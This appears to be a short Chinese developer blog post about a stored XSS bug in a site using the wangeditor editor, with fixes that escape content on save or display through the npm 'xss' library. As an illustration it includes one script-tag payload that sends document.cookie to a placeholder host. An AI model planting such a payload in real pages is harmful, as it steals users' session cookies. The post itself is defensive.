bug-xss 攻击漏洞问题

XSS 攻击漏洞是什么

XSS(Cross-Site Scripting)攻击:通过在网站上植入恶意脚本来攻击用户

举例说明

在留言板发布评论,评论内容包含恶意脚本:

javascript 复制代码
<script>document.location = "http://xxx.com/getCookie?cookie=" + document.cookie;</script>

当用户看到评论时,就会触发响应,将用户cookie发送到攻击者手中

问题描述

前端使用wangeditor富文本编辑器,正常情况下编辑器都会把内容进行转码处理,转码之后就回避xss问题,这次的问题是通过一些手段提及内容(比如postman),这样提交的代码就没有经过编辑器进行转码,读取数据时就会触发恶意代码。

解决方法

  1. 方法一:后端拿到数据后,再进行一次转码,保障进入数据库的内容是转码后的;
  2. 方法二:读取后端数据后,对要展示的数据再进行一次转码,相当于保存和读取都进行转码。

转码工具

https://jsxss.com/zh/index.html

javascript 复制代码
// 安装
npm i xss
// 引用
import filterXSS from 'xss'
const newStr=filterXSS(htmlStr); // 进行转码
相关推荐
beelan几秒前
v-on的思考
前端
山河木马3 分钟前
前端学习C++之:.h(.hpp)与.cpp文件
前端·javascript·c++
用户9272472502193 分钟前
PHP + CSS + JS + JSON 数据采集与展示系统,支持伪静态
前端
努力只为躺平7 分钟前
一文搞懂 Promise 并发控制:批量执行 vs 最大并发数,实用场景全解析!
前端·javascript
李大玄10 分钟前
Google浏览器拓展工具 "GU"->google Utils
前端·javascript·github
爱编程的喵10 分钟前
从DOM0到事件委托:揭秘JavaScript事件机制的性能密码
前端·javascript·dom
蓝倾15 分钟前
京东批量获取商品SKU操作指南
前端·后端·api
JSLove22 分钟前
常见 npm 报错问题
前端·npm
sunbyte23 分钟前
50天50个小项目 (Vue3 + Tailwindcss V4) ✨ | ContentPlaceholder(背景占位)
前端·javascript·css·vue.js·tailwindcss
爱学习的茄子24 分钟前
React Hooks进阶:从0到1打造高性能Todo应用
前端·react.js·面试